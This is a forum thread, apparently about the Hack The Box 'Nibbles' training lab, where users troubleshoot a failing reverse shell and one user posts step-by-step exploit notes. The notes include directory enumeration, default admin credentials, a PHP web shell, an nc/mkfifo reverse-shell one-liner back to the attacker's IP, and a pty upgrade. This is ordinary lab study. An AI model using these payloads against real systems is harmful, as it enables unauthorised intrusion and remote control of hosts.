Getting Started - Nibbles - Initial Foothold

Hi guys,
I have problems with the guied Nibbles machine. When I try to make the rce connection with the reverse shell; I don’t succeed with the connection but it doesn’t give me any error.

I share screenshots.



EDIT: I try it also with metasploit but gives me this error.

1 Like

It could be that nc is not installed on the target host. Maybe try starting with a simple php shell? Something like:

<?php system($_GET['cmd']); ?>

Then do some system enumeration and try to get a better shell. If the above does not work, something is wrong with your payload delivery.

Oooh okay. I assume that nc was installed because it’s a guided machine.
I will try with another shells payloads.

hi, have you solved this problem? The problem I encountered is the same as yours, and i have tried many methods but still have no idea . :sob:

hey,I found the reason! my ip number is wrong. I used the academic workstation.When i use ‘ifconfig’ ,it show the ip which is cant be connected! The right listen ip is just on the bash window.(nooo) I hope it can help anyone else to save hours!!! :melting_face: :joy:

sorry for the delay, my problem was cause my default firewall of ubuntu was rejecting the reverse shells. I recommend you to use a pentest distro or disable the firewall.

try different msf shell payloads , disable UFW firewall or if want disable them add A TABLE which rules that exlude a x IP (your ip) from x tcp por to y tcp something like :

sudo ufw allow from <>yourip/or/tun0</> proto tcp to any port

** then the commands depends pretty much on the UFW version

*** if on u put like 9292 from 0-9292 ufw enable all the port from 9292 and block all the port after 9292 … ,

Exercise notes:

1). Gain a foothold on the target and submit the user.txt flag

nmap < target ip >
http://< target ip >

  • view source

http://< target ip >/< nibbleblog >
gobuster dir -u http://< target ip >/nibbleblog --wordlist /usr/share/dirb/wordlists/common.txt

Note: Gobuster runs a bunch of words against the directories. The wordlist argument (-w) provides the path to the wordlist. In the command above, the wordlist is pre-installed.

http://< target ip >/nibbleblog/admin/
http://< target ip >/nibbleblog/content/

  • Private
  • users.xml

curl -s http://< target ip >/nibbleblog/content/private/users.xml | xmllint --format -

  • Note: The extension at the end is an argument. A list of curl arguments, here: < curl - How To Use >

  • Note: Tried to do curl -s http://< target ip > /nibbleblog/content/private/users.xml --output-dir “/home/<hack the box account number/” to no avail.

  • Note: In the hack the box walk-through the writer uses:
    gobuster dir -u http://< target ip >/ --wordlist /usr/share/dirb/wordlists/common.txt to check for additional directories. The writer states, “no other additional directories exist,” after the command. The statement appears more valid than not because the writer used the first Gobuster directory search on the http://< target ip >/, not the root of the web-application.

  • Note: Could try password cracking with Hashcat or CeWL.

http://< target ip >/nibbleblog/admin.php

  • admin
  • nibbles


  • My image

ip addr show dev tun0

  • Note: The hack the box guide says ‘< ATTACKING IP >’. The guide also mentions ‘< LISTENING PORT >’.

Right click on home screen of the Hack the Box Terminal

  • Create document > web > php
  • image.php
    • <?php system ("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc < output of ip addr show dev tun0 > < port of ip addr show dev tun0 > >/tmp/f"); ?>


  • image.php
  • Save changes
    • Note: Invalid responses

sudo nc -lvnp < port of ip addr show dev tun0 >

http://< target ip >/nibbleblog/content/private/plugins/my_image/image.php

Should see:
"Ncat: Connection from
Ncat: Connection from
/bin/sh: 0: can’t access tty; job control turned off," in home terminal.

  • id
  • python -c ‘import pty; pty.spawn(“/bin/bash”)’
  • which python3
  • python3 -c ‘import pty; pty.spawn(“/bin/bash”)’
    • cd ~
    • ls
      • cat user.txt

What are the python commands doing?:

  • python -c ‘import pty; pty.spawn(“/bin/bash”)’
  • which python3
  • python3 -c ‘import pty; pty.spawn(“/bin/bash”)’

Looks like the last one gave us capabilities to run bash commands, such as ‘cd ~’; but I am unsure?